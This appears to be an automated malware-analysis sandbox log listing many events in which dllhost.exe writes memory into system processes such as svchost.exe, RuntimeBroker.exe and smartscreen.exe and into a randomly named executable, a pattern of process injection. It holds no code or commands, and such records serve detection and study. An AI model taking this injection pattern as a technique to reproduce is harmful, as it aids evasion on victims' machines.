Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 920000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\RuntimeBroker.exe base: 1E968250000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 970000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 1A9452E0000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 1020000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\dllhost.exe base: 29227D20000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 590000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\RuntimeBroker.exe base: 283E5BE0000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 1200000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\smartscreen.exe base: 14BB07C0000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 13F0000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 22C4F660000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: B20000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 1DBAE500000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 1300000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\ApplicationFrameHost.exe base: 27B1B9F0000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: DA0000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\RuntimeBroker.exe base: 27FF3CD0000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 760000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 281CF7C0000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 12E0000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 28843650000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: BD0000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 25F39DF0000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 1320000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe base: 3CF0000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 1100000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\conhost.exe base: 1B409660000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 7D0000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 1C5325C0000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 820000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\RuntimeBroker.exe base: 225DEC30000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 15EC91C0000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 1200000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 500000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: B20000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 730000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 5F0000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 1440000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 1230000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 410000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: A00000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: BD0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: C30000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 7E0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 470000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: BD0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: D90000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 6C0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 1C0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 1300000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 13D0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 1410000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 600000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 13C0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: BB0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 6C0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 920000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: FA0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 970000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: CC0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 1020000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: EE0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 590000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 11E0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 1200000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 1200000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: B20000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 12D0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 1300000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 10E0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: DA0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 760000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 820000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 12E0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 1240000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: C30000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 1020000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 1100000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 7D0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 1030000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 820000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 3A0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 1200000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 1320000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: B20000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 5F0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: F90000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: F80000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: A00000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 820000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 7E0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 880000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: BD0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 6C0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: DA0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 1300000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 8C0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 1410000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 7E0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 13C0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 6C0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: FB0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: FA0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: A60000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: CC0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 1130000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: EE0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 560000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 11E0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 1200000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 900000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 12D0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 1510000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: C40000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 820000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 1240000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: AD0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: C30000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 190000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 1020000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: FB0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 1030000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 3A0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 5D0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 1320000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: B00000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: F90000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: F80000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 12E0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 880000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: FF0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: DA0000
